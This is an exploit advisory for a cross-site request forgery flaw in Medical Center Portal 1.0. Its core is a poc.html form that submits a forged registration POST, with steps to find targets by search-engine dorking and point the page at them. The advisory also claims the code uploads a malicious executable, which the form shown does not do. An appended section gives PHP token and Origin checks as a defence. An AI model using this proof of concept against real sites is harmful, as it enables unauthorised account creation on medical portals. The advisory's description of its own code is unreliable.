Medical Center Portal 1.0 Cross Site Request Forgery
Medical Center Portal version 1.0 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================
| # Title     : Medical Center Portal 1.0 CSRF Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip                                             |
=============================================================================================================================================

poc :

[+] Dorking in Google or other search engine.
[+] The following HTML code uploads an executable malicious file remotely.
[+] Go to line 52.
[+] Set the target site link, save changes and apply.
[+] Save code as poc.html.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Registration Form</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 20px;
            padding: 20px;
            max-width: 600px;
            background-color: #f4f4f4;
            border-radius: 8px;
        }
        .form-container {
            display: flex;
            flex-direction: column;
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group label {
            font-weight: bold;
            margin-bottom: 5px;
            display: block;
        }
        .form-group input, .form-group select {
            padding: 8px;
            width: 100%;
            border: 1px solid #ccc;
            border-radius: 4px;
        }
        .form-group select {
            cursor: pointer;
        }
        .form-group button {
            padding: 10px 15px;
            background-color: #007bff;
            color: white;
            border: none;
            cursor: pointer;
            border-radius: 4px;
        }
        .form-group button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <h2>Registration Form</h2>
    <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container">
        <div class="form-group">
            <label for="firstname">First Name:</label>
            <input type="text" id="firstname" name="firstname" required>
        </div>
        <div class="form-group">
            <label for="nid">National ID (NID):</label>
            <input type="text" id="nid" name="nid" required>
        </div>
        <div class="form-group">
            <label for="gender">Gender:</label>
            <select id="gender" name="gender" required>
                <option value="">Select Gender</option>
                <option value="male">Male</option>
                <option value="female">Female</option>
            </select>
        </div>
        <div class="form-group">
            <label for="email">Email:</label>
            <input type="email" id="email" name="email" required>
        </div>
        <div class="form-group">
            <label for="phonenumber">Phone Number:</label>
            <input type="text" id="phonenumber" name="phonenumber" required>
        </div>
        <div class="form-group">
            <label for="jobs">Job:</label>
            <select id="jobs" name="jobs" required>
                <option value="">Select Job</option>
                <option value="doctor">Doctor</option>
                <option value="nurse">Nurse</option>
                <option value="pharmacist">Pharmacist</option>
            </select>
        </div>
        <div class="form-group">
            <label for="province">Province:</label>
            <select id="province" name="province" required>
                <option value="">Select Province</option>
                <option value="province1">Province 1</option>
                <option value="province2">Province 2</option>
                <option value="province3">Province 3</option>
            </select>
        </div>
        <div class="form-group">
            <label for="city">City:</label>
            <select id="city" name="city" required>
                <option value="">Select City</option>
                <option value="city1">City 1</option>
                <option value="city2">City 2</option>
                <option value="city3">City 3</option>
            </select>
        </div>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" required>
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <input type="password" id="password" name="password" required>
        </div>
        <div class="form-group">
            <button type="submit">Register</button>
        </div>
    </form>
</body>
</html>

Greetings to :
============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
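
A server-side check that would reject the forged POST above, as an added example (not part of the original advisory and not the vendor's code). It assumes the PHP handler can include these hypothetical helpers (csrf_token, csrf_field, csrf_request_is_valid) and that the portal is served from the origin set in ALLOWED_ORIGIN.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not code from Medical Center Portal.
const ALLOWED_ORIGIN = 'http://127.0.0.1'; // assumption: the portal's own origin

// Per-session random token, created on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in the legitimate registration form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only for a request from the allowed origin carrying the session's token.
function csrf_request_is_valid(array $post, array $server, array $session): bool
{
    // Browsers attach Origin to cross-site form POSTs; reject a mismatch.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== ALLOWED_ORIGIN) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Guard to run at the top of the handler, before any database write.
if (session_status() !== PHP_SESSION_ACTIVE) {
    // SameSite keeps the session cookie off cross-site form submissions.
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
    session_start();
}
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && !csrf_request_is_valid($_POST, $_SERVER, $_SESSION)) {
    http_response_code(403);
    exit('Invalid CSRF token');
}
```

The legitimate form prints csrf_field() inside its <form> element. A page hosted on another origin, such as poc.html, cannot supply a matching value because the token is stored only in the visitor's server-side session.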